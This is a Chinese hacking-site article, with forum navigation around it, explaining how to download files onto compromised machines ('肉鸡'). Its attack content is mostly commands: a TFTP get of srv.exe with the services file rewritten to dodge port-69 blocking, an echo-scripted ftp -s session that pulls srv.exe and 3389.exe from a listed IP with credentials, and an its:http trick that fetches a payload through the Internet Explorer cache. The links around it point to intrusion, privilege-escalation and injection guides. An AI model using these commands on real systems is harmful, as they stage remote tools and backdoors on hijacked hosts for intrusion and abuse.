·	没有路由密码权限时的鸽	08-23	·	上网安全 Vista自我防范	10-11
·	让濒临崩溃的Windows XP	10-11	·	有备无患，快速自制救急	10-11
·	要你好看!Windows看图工	10-11	·	空间赞助网提供不同类型	10-11
·	讨论net.exe和net1.exe的	10-10	·	让3389远程桌面传输更通	10-10
·	巧妙入侵渗透赌博站	10-10	·	Aspx空间扫权限工具	10-10
·	Windows2003最新提权工具	10-10	·	易淘乐提供100M免费全能	10-10
·	系统开机密码忘了不着急	10-09	·	中意网络提供免费100M免	10-09
·	与众不同 Windows XP开始	10-08	·	让桌面图标翻跟斗在XP上	10-08
·	上海宽元站长资助计划-提	10-08	·	个性化Windows XP的任务	10-07
·	趣盘提供3G免费网络硬盘	10-07	·	秀山热线提供200MB免费全	10-07
·	一次艰辛的提权过程	10-06	·	成功入侵IT大卖场的渗透	10-06
·	mysqlhack- MYSQL利用工	10-06	·	lanker一句话PHP后门客户	10-06
·	WIXI提供3G免费多媒体网	10-06	·	新人网络提供100M/ftp免	10-06
·	如何利用QQ带来高流量	10-05	·	UuShare提供免费网络文件	10-05

[推荐]肉鸡里下载文件攻略

热荐 ★★★★★

肉鸡里下载文件攻略

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2006-2-9 9:58:47

一，TFTP＋自定义端口

　　限制用TFTP传送文件，一般就是直接封69端口，我们在用TFTP传送

　　文件的时候，一般用tftp -i xxx.xxx.xxx.xxx get srv.exe来下载，TFTP默认的是69端口，那么怎么才能改这个端口了？TFTPD32.exe等TFTP服务端是可以自己设置端口的，这里就不多讲，只不过在设置后要重新启动一次TFTP服务端。至于客户端

　　在system32\drivers\etc\文件夹下有一个services文件。打开如下：

　　# Copyright (c) 1993-1999 Microsoft Corp.
　　#
　　# This file contains port numbers for well-known services defined by IANA
　　#
　　# Format:
　　#
　　# / [aliases...]
　　#
　　echo 7/tcp
　　echo 7/udp
　　discard 9/tcp sink null
　　discard 9/udp sink null
　　systat 11/tcp users #Active users
　　systat 11/tcp users #Active users
　　...
　　tftp 69/udp #Trivial File Transfer
　　...

　　不难看出，69/udp就是定义tftp默认端口的，协议为udp。

　　好啦！具体怎么用只要这两句，其实就是比原来多加了一句改端口的：

　　echo tftp 8300/udp > %systemroot%\system32\drivers\etc\services

　　tftp -i xxx.xxx.xxx.xxx get srv.exe

　　注意：请先把tftp服务端端口设定为与自定义端口一样的，这里是8300。

　　安全点的做法:

　　ren %systemroot%\system32\drivers\etc\services 1

　　echo tftp 8300/udp >2

　　copy 2+%systemroot%\system32\drivers\etc\1 %systemroot%\system32\drivers\etc

　　\services

二：ftp下载文件

　　ftp下载文件一般步骤如下：

　　echo open xxx.xxx.xxx.xxx >ftp.txt
　　echo user >>ftp.txt
　　echo password >>ftp.txt
　　echo binary >>ftp.txt [可选]
　　echo get srv.exe >>ftp.txt
　　echo bye >>ftp.txt
　　ftp -s:ftp.txt
　　del ftp.txt

　　这样srv.exe文件就下在下来了。

　　三：ftp＋自定义端口

　　其实ftp自定义端口非常简单，只要在ip地址后面空格，紧跟自定义的端口就可以了，如下：

　　echo open 219.153.2.34 21 >ftp.txt

　　echo fox >>ftp.txt

　　echo blackfox >>ftp.txt

　　echo binary >>ftp.txt [可选]

　　echo get 3389.exe >>ftp.txt

　　echo bye >>ftp.txt

　　ftp -s:ftp.txt

　　del ftp.txt

　　这里自定义端口为2121，只要和ftp服务端的端口一致就行拉。
四：START ITS:HTTP://IP/文件名

　　然后cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet

　　Files\Content.IE5\"

　　然后DIR 文件名[1]

　　注意：那串长文件名要用""引起来，因为有空格

　　例子：C:\Documents and Settings\Administrator>start its:http://xxx.xxx.xxx.xxx/srv.exe

　　C:\Documents and Settings\Administrator>dir /s srv[1].exe

　　驱动器 C 中的卷没有标签。

　　卷的序列号是 D491-7A7F

　　C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files

　　\Content.IE5\0AB3MNO1 的目录

　　2003-11-22 17:48 12,832 srv[1].exe

　　1 个文件 12,832 字节

　　列出所有文件:

　　1 个文件 12,832 字节

　　0 个目录 6,425,985,024 可用字节

　　C:\Documents and Settings\Administrator>copy C:\Documents and Settings

　　\Administrator\Local Settings\Temporary Internet Files\Content.IE5\0AB3MNO1\srv[1].exe c:\srv.exe

　　已复制 1 个文件。

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章：最全面的黑客教程

下一篇文章：建立隐藏的超级用户

【字体：小大】

中介交易区

入侵网站必备经典语句	01-17
说说session	10-23
新or注入教程	09-10
Mssql2005注入命令总结	07-30
阿D常用注入命令汇总	07-30
Penetration Testing 渗透测试	07-04
Exploit Sites 和0day公布的站点	06-18
3389得到肉鸡后的命令	06-18
Cmd模式下的入侵技术大全	05-30
阿D常用注入命令整理	05-17
opendatasource学习记录	05-14
SQL Injection规避入侵检测技术总	05-06